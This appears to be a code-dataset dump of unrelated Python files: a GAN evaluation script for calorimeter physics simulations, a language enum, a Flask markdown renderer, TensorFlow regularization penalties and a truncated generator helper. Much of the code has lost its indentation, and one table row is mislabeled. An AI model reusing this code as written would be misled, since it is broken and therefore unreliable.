generated_images500 = g.predict(generator_in, verbose=False, batch_size=100)
isreal500, aux_out500 = np.array(d.predict(generated_images500, verbose=False, batch_size=100))
generated_images500 = np.squeeze(generated_images500)
## Use Discriminator for actual images
if (get_actual):
## events for 10 GeV
image10 = np.expand_dims(X10, axis=-1)
isreal2_10, aux_out2_10 = np.array(d.predict(image10, verbose=False, batch_size=100))
## events for 50 GeV
image50 = np.expand_dims(X50, axis=-1)
isreal2_50, aux_out2_50 = np.array(d.predict(image50, verbose=False, batch_size=100))
## events for 100 GeV
image100 = np.expand_dims(X100, axis=-1)
    isreal2_100, aux_out2_100 = np.array(d.predict(image100, verbose=False, batch_size=100))
## events for 200 GeV
image200 = np.expand_dims(X200, axis=-1)
isreal2_200, aux_out2_200 = np.array(d.predict(image200, verbose=False, batch_size=100))
#calculations for actual
for j in range(num_events):
events_act10[j]= X10[j]
events_act50[j]= X50[j]
events_act100[j]= X100[j]
events_act200[j]= X200[j]
max_pos_act_10[j] = np.unravel_index(events_act10[j].argmax(), (25, 25, 25))
max_pos_act_50[j] = np.unravel_index(events_act50[j].argmax(), (25, 25, 25))
max_pos_act_100[j] = np.unravel_index(events_act100[j].argmax(), (25, 25, 25))
max_pos_act_200[j] = np.unravel_index(events_act200[j].argmax(), (25, 25, 25))
sum_act10[j, 0] = np.sum(events_act10[j], axis=(1,2))
sum_act10[j, 1] = np.sum(events_act10[j], axis=(0,2))
sum_act10[j, 2] = np.sum(events_act10[j], axis=(0,1))
sum_act50[j, 0] = np.sum(events_act50[j], axis=(1,2))
sum_act50[j, 1] = np.sum(events_act50[j], axis=(0,2))
sum_act50[j, 2] = np.sum(events_act50[j], axis=(0,1))
sum_act100[j, 0] = np.sum(events_act100[j], axis=(1,2))
sum_act100[j, 1] = np.sum(events_act100[j], axis=(0,2))
sum_act100[j, 2] = np.sum(events_act100[j], axis=(0,1))
sum_act200[j, 0] = np.sum(events_act200[j], axis=(1,2))
sum_act200[j, 1] = np.sum(events_act200[j], axis=(0,2))
sum_act200[j, 2] = np.sum(events_act200[j], axis=(0,1))
### Calculations for generated
for j in range(num_events):
events_gan10[j]= generated_images10[j]
events_gan50[j]= generated_images50[j]
events_gan100[j]= generated_images100[j]
events_gan150[j]= generated_images150[j]
events_gan200[j]= generated_images200[j]
events_gan300[j]= generated_images300[j]
events_gan400[j]= generated_images400[j]
events_gan500[j]= generated_images500[j]
max_pos_gan_10[j] = np.unravel_index(events_gan10[j].argmax(), (25, 25, 25))
max_pos_gan_50[j] = np.unravel_index(events_gan50[j].argmax(), (25, 25, 25))
max_pos_gan_100[j] = np.unravel_index(events_gan100[j].argmax(), (25, 25, 25))
max_pos_gan_150[j] = np.unravel_index(events_gan150[j].argmax(), (25, 25, 25))
max_pos_gan_200[j] = np.unravel_index(events_gan200[j].argmax(), (25, 25, 25))
max_pos_gan_300[j] = np.unravel_index(events_gan300[j].argmax(), (25, 25, 25))
max_pos_gan_400[j] = np.unravel_index(events_gan400[j].argmax(), (25, 25, 25))
max_pos_gan_500[j] = np.unravel_index(events_gan500[j].argmax(), (25, 25, 25))
    sum_gan10[j, 0] = np.sum(events_gan10[j], axis=(1,2))
    sum_gan10[j, 1] = np.sum(events_gan10[j], axis=(0,2))
    sum_gan10[j, 2] = np.sum(events_gan10[j], axis=(0,1))
sum_gan50[j, 0] = np.sum(events_gan50[j], axis=(1,2))
sum_gan50[j, 1] = np.sum(events_gan50[j], axis=(0,2))
sum_gan50[j, 2] = np.sum(events_gan50[j], axis=(0,1))
sum_gan100[j, 0] = np.sum(events_gan100[j], axis=(1,2))
sum_gan100[j, 1] = np.sum(events_gan100[j], axis=(0,2))
sum_gan100[j, 2] = np.sum(events_gan100[j], axis=(0,1))
sum_gan150[j, 0] = np.sum(events_gan150[j], axis=(1,2))
sum_gan150[j, 1] = np.sum(events_gan150[j], axis=(0,2))
sum_gan150[j, 2] = np.sum(events_gan150[j], axis=(0,1))
sum_gan200[j, 0] = np.sum(events_gan200[j], axis=(1,2))
sum_gan200[j, 1] = np.sum(events_gan200[j], axis=(0,2))
sum_gan200[j, 2] = np.sum(events_gan200[j], axis=(0,1))
sum_gan300[j, 0] = np.sum(events_gan300[j], axis=(1,2))
sum_gan300[j, 1] = np.sum(events_gan300[j], axis=(0,2))
sum_gan300[j, 2] = np.sum(events_gan300[j], axis=(0,1))
sum_gan400[j, 0] = np.sum(events_gan400[j], axis=(1,2))
sum_gan400[j, 1] = np.sum(events_gan400[j], axis=(0,2))
sum_gan400[j, 2] = np.sum(events_gan400[j], axis=(0,1))
sum_gan500[j, 0] = np.sum(events_gan500[j], axis=(1,2))
sum_gan500[j, 1] = np.sum(events_gan500[j], axis=(0,2))
sum_gan500[j, 2] = np.sum(events_gan500[j], axis=(0,1))
## Generate Data table to screen
if (get_actual):
print "Actual Data"
print "Energy\t\t Events\t\tMaximum Value\t\t Maximum loc\t\t\t Mean\t\t\t Minimum\t\t"
print "50 \t\t%d \t\t%f \t\t%s \t\t%f \t\t%f" %(index10, np.amax(events_act10), str(np.unravel_index(events_act10.argmax(), (index10, 25, 25, 25))), np.mean(events_act10), np.amin(events_act10))
print "50 \t\t%d \t\t%f \t\t%s \t\t%f \t\t%f" %(index50, np.amax(events_act50), str(np.unravel_index(events_act50.argmax(), (index50, 25, 25, 25))), np.mean(events_act50), np.amin(events_act50))
print "100 \t\t%d \t\t%f \t\t%s \t\t%f \t\t%f" %(index100, np.amax(events_act100), str(np.unravel_index(events_act100.argmax(), (index100, 25, 25, 25))), np.mean(events_act100), np.amin(events_act100))
print "200 \t\t%d \t\t%f \t\t%s \t\t%f \t\t%f" %(index200, np.amax(events_act200), str(np.unravel_index(events_act200.argmax(), (index200, 25, 25, 25))), np.mean(events_act200), np.amin(events_act200))
#### Generate GAN table to screen
print "Generated Data"
print "Energy\t\t Events\t\tMaximum Value\t\t Maximum loc\t\t\t Mean\t\t\t Minimum\t\t"
print "10 \t\t%d \t\t%f \t\t%s \t\t%f \t\t%f" %(index10, np.amax(events_gan10), str(np.unravel_index(events_gan10.argmax(), (index10, 25, 25, 25))), np.mean(events_gan10), np.amin(events_gan10))
print "50 \t\t%d \t\t%f \t\t%s \t\t%f \t\t%f" %(index50, np.amax(events_gan50), str(np.unravel_index(events_gan50.argmax(), (index50, 25, 25, 25))), np.mean(events_gan50), np.amin(events_gan50))
print "100 \t\t%d \t\t%f \t\t%s \t\t%f \t\t%f" %(index100, np.amax(events_gan100), str(np.unravel_index(events_gan100.argmax(), (index100, 25, 25, 25))), np.mean(events_gan100), np.amin(events_gan100))
print "150 \t\t%d \t\t%f \t\t%s \t\t%f \t\t%f" %(index150, np.amax(events_gan150), str(np.unravel_index(events_gan150.argmax(), (index150, 25, 25, 25))), np.mean(events_gan150), np.amin(events_gan150))
print "200 \t\t%d \t\t%f \t\t%s \t\t%f \t\t%f" %(index200, np.amax(events_gan200), str(np.unravel_index(events_gan200.argmax(), (index200, 25, 25, 25))), np.mean(events_gan200), np.amin(events_gan200))
print "300 \t\t%d \t\t%f \t\t%s \t\t%f \t\t%f" %(index300, np.amax(events_gan300), str(np.unravel_index(events_gan300.argmax(), (index300, 25, 25, 25))), np.mean(events_gan300), np.amin(events_gan300))
print "400 \t\t%d \t\t%f \t\t%s \t\t%f \t\t%f" %(index400, np.amax(events_gan400), str(np.unravel_index(events_gan400.argmax(), (index400, 25, 25, 25))), np.mean(events_gan400), np.amin(events_gan400))
print "500 \t\t%d \t\t%f \t\t%s \t\t%f \t\t%f" %(index500, np.amax(events_gan500), str(np.unravel_index(events_gan500.argmax(), (index500, 25, 25, 25))), np.mean(events_gan500), np.amin(events_gan500))
def safe_mkdir(path):
'''
Safe mkdir (i.e., don't create if already exists,
and no violation of race conditions)
'''
from os import makedirs
from errno import EEXIST
try:
makedirs(path)
except OSError as exception:
if exception.errno != EEXIST:
raise exception
## Make folders for plots
discdir = 'fixed_plots/disc_outputs'
safe_mkdir(discdir)
actdir = 'fixed_plots/Actual'
safe_mkdir(actdir)
gendir = 'fixed_plots/Generated'
safe_mkdir(gendir)
comdir = 'fixed_plots/Combined'
safe_mkdir(comdir)
## Make plots for generated data
plot_real(isreal10, index10, os.path.join(discdir, 'real_10.pdf'), 1, 'GAN 10')
plot_real(isreal50, index50, os.path.join(discdir, 'real_50.pdf'), 2, 'GAN 50')
plot_real(isreal100, index100, os.path.join(discdir, 'real_100.pdf'), 3, 'GAN 100')
plot_real(isreal150, index150, os.path.join(discdir, 'real_150.pdf'), 4, 'GAN 150')
plot_real(isreal200, index200, os.path.join(discdir, 'real_200.pdf'), 5, 'GAN 200')
plot_real(isreal300, index300, os.path.join(discdir, 'real_300.pdf'), 6, 'GAN 300')
plot_real(isreal400, index400, os.path.join(discdir, 'real_400.pdf'), 47, 'GAN 400')
plot_real(isreal500, index500, os.path.join(discdir, 'real_500.pdf'), 48, 'GAN 500')
plot_error(energy_sampled10, aux_out10, index10, os.path.join(discdir, 'error_10.pdf'), 7, 'GAN 10')
plot_error(energy_sampled50, aux_out50, index50, os.path.join(discdir, 'error_50.pdf'), 8, 'GAN 50')
plot_error(energy_sampled100, aux_out100, index100, os.path.join(discdir, 'error_100.pdf'), 9, 'GAN 100')
plot_error(energy_sampled200, aux_out200, index200, os.path.join(discdir, 'error_200.pdf'), 10, 'GAN 200')
plot_error(energy_sampled300, aux_out300, index300, os.path.join(discdir, 'error_300.pdf'), 11, 'GAN 300')
plot_error(energy_sampled400, aux_out400, index400, os.path.join(discdir, 'error_400.pdf'), 49, 'GAN 400')
plot_error(energy_sampled500, aux_out500, index500, os.path.join(discdir, 'error_500.pdf'), 50, 'GAN 500')
plot_max(max_pos_gan_10, index10, os.path.join(comdir, 'Position_of_max_10.pdf'), 12, 'GAN 10')
plot_max(max_pos_gan_50, index50, os.path.join(comdir, 'Position_of_max_50.pdf'), 13, 'GAN 50')
plot_max(max_pos_gan_100, index100, os.path.join(comdir, 'Position_of_max_100.pdf'), 14, 'GAN 100')
plot_max(max_pos_gan_150, index150, os.path.join(comdir, 'Position_of_max_150.pdf'), 15, 'GAN 150')
plot_max(max_pos_gan_200, index200, os.path.join(comdir, 'Position_of_max_200.pdf'), 16, 'GAN 200')
plot_max(max_pos_gan_300, index300, os.path.join(comdir, 'Position_of_max_300.pdf'), 17, 'GAN 300')
plot_max(max_pos_gan_400, index400, os.path.join(comdir, 'Position_of_max_400.pdf'), 51, 'GAN 400')
plot_max(max_pos_gan_500, index500, os.path.join(comdir, 'Position_of_max_500.pdf'), 52, 'GAN 500')
plot_energy_hist(sum_gan10, index10, os.path.join(comdir, 'hist_10.pdf'), 18, 'GAN 10')
plot_energy_hist(sum_gan50, index50, os.path.join(comdir, 'hist_50.pdf'), 19, 'GAN 50')
plot_energy_hist(sum_gan100, index100, os.path.join(comdir, 'hist_100.pdf'), 20, 'GAN 100')
plot_energy_hist(sum_gan150, index150, os.path.join(comdir, 'hist_150.pdf'), 21, 'GAN 150')
plot_energy_hist(sum_gan200, index200, os.path.join(comdir, 'hist_200.pdf'), 22, 'GAN 200')
plot_energy_hist(sum_gan300, index300, os.path.join(comdir, 'hist_300.pdf'), 23, 'GAN 300')
plot_energy_hist(sum_gan400, index400, os.path.join(comdir, 'hist_400.pdf'), 53, 'GAN 400')
plot_energy_hist(sum_gan500, index500, os.path.join(comdir, 'hist_500.pdf'), 54, 'GAN 500')
## Make plots for real data
if (get_actual):
plot_real(isreal2_10, index10, os.path.join(discdir, 'real_10_act.pdf'), 61, 'Data 10')
plot_real(isreal2_50, index50, os.path.join(discdir, 'real_50_act.pdf'), 62, 'Data 50')
plot_real(isreal2_100, index100, os.path.join(discdir, 'real_100_act.pdf'), 63, 'Data 100')
plot_real(isreal2_200, index200, os.path.join(discdir, 'real_200_act.pdf'), 65, 'Data 200')
plot_error(energy_sampled10, aux_out2_10, index10, os.path.join(discdir, 'error_10_act.pdf'), 67, 'Data 10', 0)
plot_error(energy_sampled50, aux_out2_50, index50, os.path.join(discdir, 'error_50_act.pdf'), 68, 'Data 50', 0)
plot_error(energy_sampled100, aux_out2_100, index100, os.path.join(discdir, 'error_100_act.pdf'), 69, 'Data 100')
plot_error(energy_sampled200, aux_out2_200, index200, os.path.join(discdir, 'error_200_act.pdf'), 70, 'Data 200', 0)
    plot_max(max_pos_act_10, index10, os.path.join(comdir, 'Position_of_max_10_act.pdf'), 72, 'Data 10')
plot_max(max_pos_act_50, index50, os.path.join(comdir, 'Position_of_max_50_act.pdf'), 73, 'Data 50')
plot_max(max_pos_act_100, index100, os.path.join(comdir, 'Position_of_max_100_act.pdf'), 74, 'Data 100')
plot_max(max_pos_act_200, index200, os.path.join(comdir, 'Position_of_max_200_act.pdf'), 76, 'Data 200')
plot_energy_hist(sum_act10, index10, os.path.join(comdir, 'hist_10_act.pdf'), 78, 'Data 10')
plot_energy_hist(sum_act50, index50, os.path.join(comdir, 'hist_50_act.pdf'), 79, 'Data 50')
plot_energy_hist(sum_act100, index100, os.path.join(comdir, 'hist_100_act.pdf'), 80, 'Data 100')
plot_energy_hist(sum_act200, index200, os.path.join(comdir, 'hist_200_act.pdf'), 82, 'Data 200')
plot_energy(sum_act10, index10, os.path.join(actdir, 'Flat_energy.pdf'), 25, 10)
plot_energy(sum_act50, index50, os.path.join(actdir, 'Flat_energy.pdf'), 25, 50)
plot_energy(sum_act100, index100, os.path.join(actdir, 'Flat_energy.pdf'),25, 100)
plot_energy(sum_act200, index200, os.path.join(actdir, 'Flat_energy.pdf'),25, 200)
plot_energy_hist(sum_act10, index10, os.path.join(actdir, 'hist_all.pdf'), 26, 'Data 10')
plot_energy_hist(sum_act50, index50, os.path.join(actdir, 'hist_all.pdf'), 26, 'Data 50')
plot_energy_hist(sum_act100, index100, os.path.join(actdir, 'hist_all.pdf'), 26, 'Data 100')
plot_energy_hist(sum_act200, index200, os.path.join(actdir, 'hist_all.pdf'), 26, 'Data 200')
plot_energy_mean(sum_act10, index10, os.path.join(actdir, 'hist_mean_all.pdf'), 27, 'Data 10')
plot_energy_mean(sum_act50, index50, os.path.join(actdir, 'hist_mean_all.pdf'), 27, 'Data 50')
plot_energy_mean(sum_act100, index100, os.path.join(actdir, 'hist_mean_all.pdf'), 27, 'Data 100')
plot_energy_mean(sum_act200, index200, os.path.join(actdir, 'hist_mean_all.pdf'), 27, 'Data 200')
X = np.concatenate((X10, X50, X100, X200))
plot_ecal(X, 4 * num_events, os.path.join(comdir, 'ECAL_sum.pdf'), 28, 'All Data')
plot_energy2(np.multiply(100, aux_out2_10), index10, os.path.join(comdir, 'energy10_act.pdf'), 84, 'Data 10', 'green')
plot_energy2(np.multiply(100, aux_out2_50), index50, os.path.join(comdir, 'energy50_act.pdf'), 85, 'Data 50', 'green')
plot_energy2(np.multiply(100, aux_out2_100), index100, os.path.join(comdir, 'energy100_act.pdf'), 86, 'Data 100', 'green')
plot_energy2(np.multiply(100, aux_out2_200), index200, os.path.join(comdir, 'energy200_act.pdf'), 88, 'Data 200', 'green')
plot_ecal(events_act10, num_events, os.path.join(comdir, 'ECAL_sum10_act.pdf'), 91, 'Data 10')
plot_ecal(events_act50, num_events, os.path.join(comdir, 'ECAL_sum50_act.pdf'), 92, 'Data 50')
plot_ecal(events_act100, num_events, os.path.join(comdir, 'ECAL_sum100_act.pdf'), 93, 'Data 100')
plot_ecal(events_act200, num_events, os.path.join(comdir, 'ECAL_sum200_act.pdf'), 95, 'Data 200')
Y = np.concatenate((energy_sampled10, energy_sampled50, energy_sampled100, energy_sampled150, energy_sampled200, energy_sampled300, energy_sampled400, energy_sampled500))
plot_energy2(np.multiply(100, Y), 6 * num_events, os.path.join(comdir, 'energy.pdf'), 29, 'Primary Energy')
generated_images = np.concatenate((generated_images10, generated_images50, generated_images100, generated_images150, generated_images200, generated_images300, generated_images400, generated_images500))
plot_ecal(generated_images, 6 * num_events, os.path.join(comdir, 'ECAL_sum.pdf'), 28, 'GAN')
## Plots for Generated
plot_max(max_pos_gan_10, index10, os.path.join(gendir, 'Position_of_max.pdf'), 30, 'GAN 10')
plot_max(max_pos_gan_50, index50, os.path.join(gendir, 'Position_of_max.pdf'), 30, 'GAN 50')
plot_max(max_pos_gan_100, index100, os.path.join(gendir, 'Position_of_max.pdf'), 30, 'GAN 100')
plot_max(max_pos_gan_150, index150, os.path.join(gendir, 'Position_of_max.pdf'), 30, 'GAN 150')
plot_max(max_pos_gan_200, index200, os.path.join(gendir, 'Position_of_max.pdf'), 30, 'GAN 200')
plot_max(max_pos_gan_300, index300, os.path.join(gendir, 'Position_of_max.pdf'), 30, 'GAN 300')
plot_max(max_pos_gan_400, index400, os.path.join(gendir, 'Position_of_max.pdf'), 30, 'GAN 400')
plot_max(max_pos_gan_500, index500, os.path.join(gendir, 'Position_of_max.pdf'), 30, 'GAN 500')
plot_energy(sum_gan10, index10, os.path.join(gendir, 'Flat_energy.pdf'), 31, 'GAN 10')
plot_energy(sum_gan50, index50, os.path.join(gendir, 'Flat_energy.pdf'), 31, 'GAN 50')
plot_energy(sum_gan100, index100, os.path.join(gendir, 'Flat_energy.pdf'), 31, 'GAN 100')
plot_energy(sum_gan150, index150, os.path.join(gendir, 'Flat_energy.pdf'), 31, 'GAN 150')
plot_energy(sum_gan200, index200, os.path.join(gendir, 'Flat_energy.pdf'), 31, 'GAN 200')
plot_energy(sum_gan300, index300, os.path.join(gendir, 'Flat_energy.pdf'), 31, 'GAN 300')
plot_energy(sum_gan400, index400, os.path.join(gendir, 'Flat_energy.pdf'), 31, 'GAN 400')
plot_energy(sum_gan500, index500, os.path.join(gendir, 'Flat_energy.pdf'), 31, 'GAN 500')
plot_energy_hist(sum_gan10, index10, os.path.join(gendir, 'hist_all.pdf'), 32, 'GAN 10')
plot_energy_hist(sum_gan50, index50, os.path.join(gendir, 'hist_all.pdf'), 32, 'GAN 50')
plot_energy_hist(sum_gan100, index100, os.path.join(gendir, 'hist_all.pdf'), 32, 'GAN 100')
plot_energy_hist(sum_gan150, index150, os.path.join(gendir, 'hist_all.pdf'), 32, 'GAN 150')
plot_energy_hist(sum_gan200, index200, os.path.join(gendir, 'hist_all.pdf'), 32, 'GAN 200')
plot_energy_hist(sum_gan300, index300, os.path.join(gendir, 'hist_all.pdf'), 32, 'GAN 300')
plot_energy_hist(sum_gan400, index400, os.path.join(gendir, 'hist_all.pdf'), 32, 'GAN 400')
plot_energy_hist(sum_gan500, index500, os.path.join(gendir, 'hist_all.pdf'), 32, 'GAN 500')
plot_energy_mean(sum_gan10, index10, os.path.join(gendir, 'hist_mean_all.pdf'), 33, 10)
plot_energy_mean(sum_gan50, index50, os.path.join(gendir, 'hist_mean_all.pdf'), 33, 50)
plot_energy_mean(sum_gan100, index100, os.path.join(gendir, 'hist_mean_all.pdf'), 33, 100)
plot_energy_mean(sum_gan150, index150, os.path.join(gendir, 'hist_mean_all.pdf'), 33, 150)
plot_energy_mean(sum_gan200, index200, os.path.join(gendir, 'hist_mean_all.pdf'), 33, 200)
plot_energy_mean(sum_gan300, index300, os.path.join(gendir, 'hist_mean_all.pdf'), 33, 300)
plot_energy_mean(sum_gan400, index400, os.path.join(gendir, 'hist_mean_all.pdf'), 33, 400)
plot_energy_mean(sum_gan500, index500, os.path.join(gendir, 'hist_mean_all.pdf'), 33, 500)
#plot_energy2(np.multiply(100, energy_sampled10), index10, os.path.join(comdir, 'energy10.pdf'), 34, 'Primary 10', 'red', '--')
#plot_energy2(np.multiply(100, energy_sampled50), index50, os.path.join(comdir, 'energy50.pdf'), 35, 'Primary 50', 'blue', '--')
#plot_energy2(np.multiply(100, energy_sampled100), index100, os.path.join(comdir, 'energy100.pdf'), 36, 'Primary 100', 'green', '--')
#plot_energy2(np.multiply(100, energy_sampled150), index150, os.path.join(comdir, 'energy150.pdf'), 37, 'Primary 150', 'yellow', '--')
#plot_energy2(np.multiply(100, energy_sampled200), index200, os.path.join(comdir, 'energy200.pdf'), 38, 'Primary 200', 'cyan', '--')
#plot_energy2(np.multiply(100, energy_sampled300), index300, os.path.join(comdir, 'energy300.pdf'), 39, 'Primary 300', 'magenta', '--')
#plot_energy2(np.multiply(100, energy_sampled400), index400, os.path.join(comdir, 'energy400.pdf'), 39, 'Primary 400', 'magenta', '--')
#plot_energy2(np.multiply(100, energy_sampled500), index500, os.path.join(comdir, 'energy500.pdf'), 39, 'Primary 500', 'magenta', '--')
plot_energy2(np.multiply(100, aux_out10), index10, os.path.join(comdir, 'energy10.pdf'), 34, 'GAN 10')
plot_energy2(np.multiply(100, aux_out50), index50, os.path.join(comdir, 'energy50.pdf'), 35, 'GAN 50')
plot_energy2(np.multiply(100, aux_out100), index100, os.path.join(comdir, 'energy100.pdf'), 36, 'GAN 100')
plot_energy2(np.multiply(100, aux_out150), index150, os.path.join(comdir, 'energy150.pdf'), 37, 'GAN 150')
plot_energy2(np.multiply(100, aux_out200), index200, os.path.join(comdir, 'energy200.pdf'), 38, 'GAN 200')
plot_energy2(np.multiply(100, aux_out300), index300, os.path.join(comdir, 'energy300.pdf'), 39, 'GAN 300')
plot_energy2(np.multiply(100, aux_out400), index400, os.path.join(comdir, 'energy400.pdf'), 55, 'GAN 400')
plot_energy2(np.multiply(100, aux_out500), index500, os.path.join(comdir, 'energy500.pdf'), 56, 'GAN 500')
#plot_energy2(np.multiply(100, energy_sampled10), index10, os.path.join(comdir, 'energy_all.pdf'), 40, 'Primary 10', 'red', '--')
#plot_energy2(np.multiply(100, energy_sampled50), index50, os.path.join(comdir, 'energy_all.pdf'), 40, 'Primary 50', 'blue', '--')
#plot_energy2(np.multiply(100, energy_sampled100), index100, os.path.join(comdir, 'energy_all.pdf'), 40, 'Primary 100', 'green', '--')
#plot_energy2(np.multiply(100, energy_sampled150), index150, os.path.join(comdir, 'energy_all.pdf'), 40, 'Primary 150', 'yellow', '--')
#plot_energy2(np.multiply(100, energy_sampled200), index200, os.path.join(comdir, 'energy_all.pdf'), 40, 'Primary 200', 'cyan', '--')
#plot_energy2(np.multiply(100, energy_sampled300), index300, os.path.join(comdir, 'energy_all.pdf'), 40, 'Primary 300', 'magenta', '--')
#plot_energy2(np.multiply(100, energy_sampled400), index400, os.path.join(comdir, 'energy_all.pdf'), 40, 'Primary 400', 'magenta', '--')
#plot_energy2(np.multiply(100, energy_sampled500), index500, os.path.join(comdir, 'energy_all.pdf'), 40, 'Primary 500', 'magenta', '--')
plot_energy2(np.multiply(100, aux_out10), index10, os.path.join(comdir, 'energy_all.pdf'), 40, 'GAN 10', 'red', '-')
plot_energy2(np.multiply(100, aux_out50), index50, os.path.join(comdir, 'energy_all.pdf'), 40, 'GAN 50', 'blue', '-')
plot_energy2(np.multiply(100, aux_out100), index100, os.path.join(comdir, 'energy_all.pdf'), 40, 'GAN 100', 'green', '-')
plot_energy2(np.multiply(100, aux_out150), index150, os.path.join(comdir, 'energy_all.pdf'), 40, 'GAN 150', 'yellow', '-')
plot_energy2(np.multiply(100, aux_out200), index200, os.path.join(comdir, 'energy_all.pdf'), 40, 'GAN 200', 'cyan', '-')
plot_energy2(np.multiply(100, aux_out300), index300, os.path.join(comdir, 'energy_all.pdf'), 40, 'GAN 300', 'magenta', '-')
plot_energy2(np.multiply(100, aux_out400), index400, os.path.join(comdir, 'energy_all.pdf'), 40, 'GAN 400', 'red', '-')
plot_energy2(np.multiply(100, aux_out500), index500, os.path.join(comdir, 'energy_all.pdf'), 40, 'GAN 500', 'blue', '-')
plot_ecal(events_gan10, num_events, os.path.join(comdir, 'ECAL_sum10.pdf'), 41, 'GAN 10')
plot_ecal(events_gan50, num_events, os.path.join(comdir, 'ECAL_sum50.pdf'), 42, 'GAN 50')
plot_ecal(events_gan100, num_events, os.path.join(comdir, 'ECAL_sum100.pdf'), 43, 'GAN 100')
plot_ecal(events_gan150, num_events, os.path.join(comdir, 'ECAL_sum150.pdf'), 44, 'GAN 150')
plot_ecal(events_gan200, num_events, os.path.join(comdir, 'ECAL_sum200.pdf'), 45, 'GAN 200')
plot_ecal(events_gan300, num_events, os.path.join(comdir, 'ECAL_sum300.pdf'), 46, 'GAN 300')
plot_ecal(events_gan400, num_events, os.path.join(comdir, 'ECAL_sum400.pdf'), 57, 'GAN 400')
plot_ecal(events_gan500, num_events, os.path.join(comdir, 'ECAL_sum500.pdf'), 58, 'GAN 500')
### Save generated image data to file
if (save):
generated_images = (generated_images10)
generated_images = np.squeeze(generated_images)
with h5py.File(filename10,'w') as outfile:
outfile.create_dataset('ECAL',data=generated_images)
outfile.create_dataset('LABELS',data=energy_sampled10)
outfile.create_dataset('AUX',data=aux_out10)
outfile.create_dataset('ISREAL',data=isreal10)
print "Generated ECAL saved to ", filename10
generated_images = (generated_images50)
generated_images = np.squeeze(generated_images)
with h5py.File(filename50,'w') as outfile:
outfile.create_dataset('ECAL',data=generated_images)
outfile.create_dataset('LABELS',data=energy_sampled50)
outfile.create_dataset('AUX',data=aux_out50)
outfile.create_dataset('ISREAL',data=isreal50)
print "Generated ECAL saved to ", filename50
generated_images = (generated_images100)
generated_images = np.squeeze(generated_images)
with h5py.File(filename100,'w') as outfile:
outfile.create_dataset('ECAL',data=generated_images)
outfile.create_dataset('LABELS',data=energy_sampled100)
outfile.create_dataset('AUX',data=aux_out100)
outfile.create_dataset('ISREAL',data=isreal100)
print "Generated ECAL saved to ", filename100
generated_images = (generated_images150)
generated_images = np.squeeze(generated_images)
with h5py.File(filename150,'w') as outfile:
outfile.create_dataset('ECAL',data=generated_images)
outfile.create_dataset('LABELS',data=energy_sampled150)
outfile.create_dataset('AUX',data=aux_out150)
outfile.create_dataset('ISREAL',data=isreal150)
print "Generated ECAL saved to ", filename150
generated_images = (generated_images200)
generated_images = np.squeeze(generated_images)
with h5py.File(filename200,'w') as outfile:
outfile.create_dataset('ECAL',data=generated_images)
outfile.create_dataset('LABELS',data=energy_sampled200)
outfile.create_dataset('AUX',data=aux_out200)
outfile.create_dataset('ISREAL',data=isreal200)
print "Generated ECAL saved to ", filename200
generated_images = (generated_images300)
generated_images = np.squeeze(generated_images)
with h5py.File(filename300,'w') as outfile:
outfile.create_dataset('ECAL',data=generated_images)
outfile.create_dataset('LABELS',data=energy_sampled300)
outfile.create_dataset('AUX',data=aux_out300)
outfile.create_dataset('ISREAL',data=isreal300)
print "Generated ECAL saved to ", filename300
generated_images = (generated_images400)
generated_images = np.squeeze(generated_images)
with h5py.File(filename400,'w') as outfile:
outfile.create_dataset('ECAL',data=generated_images)
outfile.create_dataset('LABELS',data=energy_sampled400)
outfile.create_dataset('AUX',data=aux_out400)
outfile.create_dataset('ISREAL',data=isreal400)
print "Generated ECAL saved to ", filename400
generated_images = (generated_images500)
generated_images = np.squeeze(generated_images)
    with h5py.File(filename500,'w') as outfile:
outfile.create_dataset('ECAL',data=generated_images)
outfile.create_dataset('LABELS',data=energy_sampled500)
outfile.create_dataset('AUX',data=aux_out500)
outfile.create_dataset('ISREAL',data=isreal500)
print "Generated ECAL saved to ", filename500
print 'Plots are saved in', ' fixed_plots/disc_outputs, ', 'fixed_plots/Actual, ', 'fixed_plots/Generated and ', 'fixed_plots/Combined'
|
StarcoderdataPython
|
18523
|
<gh_stars>100-1000
"""
Language enumeration. Part of the StoryTechnologies project.
June 12, 2016
<NAME> (<EMAIL>)
"""
from enum import Enum
class Language(Enum):
# https://en.wikipedia.org/wiki/List_of_ISO_639-1_codes
# https://en.wikipedia.org/wiki/ISO_639-2
ENG = 1 # English
SPA = 2 # Spanish
DEU = 3 # German
ITA = 4 # Italian
FRA = 5 # French
NLD = 6 # Dutch
def __str__(self):
return self.name
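
# Hedged usage sketch (not part of the original module):
#   >>> str(Language.ENG)
#   'ENG'
#   >>> Language(3)
#   <Language.DEU: 3>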
|
StarcoderdataPython
|
1622276
|
from flask import render_template_string, current_app
from mistune import create_markdown
md_to_unsafe_html = create_markdown(escape=False, renderer="html", plugins=["strikethrough"])
def render_markdown(filename):
try:
with open(f"{current_app.config['MARKDOWN_PATH']}{filename}", "r") as f:
string = f.read()
    except Exception:
if current_app.env == "production":
current_app.logger.critical("Failed to render missing markdown file: %s", filename, exc_info=True)
return ""
raise
string = render_template_string(string)
# Jinja has now escaped any HTML in the md file
return md_to_unsafe_html(string)
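
# Hedged usage sketch (not part of the original module); the route, config value and
# markdown file name are illustrative only:
#
#   app.config["MARKDOWN_PATH"] = "content/"
#
#   @app.route("/about")
#   def about():
#       # returns the HTML rendered from content/about.md (empty string in production
#       # if the file is missing)
#       return render_markdown("about.md")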
|
StarcoderdataPython
|
91249
|
import tensorflow as tf
def ridge(alpha, beta, family):
return tf.reduce_sum(tf.square(beta))
def lasso(alpha, beta, family):
return tf.reduce_sum(tf.abs(beta))
def network_fusion_x(graph):
graph = tf.cast(graph, tf.float32)
def tmp(alpha, beta, family):
return tf.linalg.trace(tf.matmul(tf.transpose(beta), tf.matmul(graph, beta)))
return tmp
def network_fusion_y(graph):
graph = tf.cast(graph, tf.float32)
def tmp(alpha, beta, family):
return tf.linalg.trace(tf.matmul(beta, tf.matmul(graph, tf.transpose(beta))))
return tmp
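# Illustrative sketch (not part of the original module), assuming TensorFlow 2.x
# eager execution: every penalty shares the signature (alpha, beta, family), so
# they are interchangeable; the graph-based penalties are built via closures.
if __name__ == "__main__":
    beta = tf.constant([[1.0], [-2.0], [3.0]])
    print(ridge(None, beta, None).numpy())  # 1 + 4 + 9 = 14.0
    print(lasso(None, beta, None).numpy())  # 1 + 2 + 3 = 6.0
    graph = tf.eye(3)  # placeholder graph matrix for demonstration
    print(network_fusion_x(graph)(None, beta, None).numpy())  # 14.0 with the identity graph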
|
StarcoderdataPython
|
1699219
|
from compat.functools import wraps as _wraps
from sys import exc_info as _exc_info
class _from(object):
def __init__(self, EXPR):
self.iterator = iter(EXPR)
def supergenerator(genfunct):
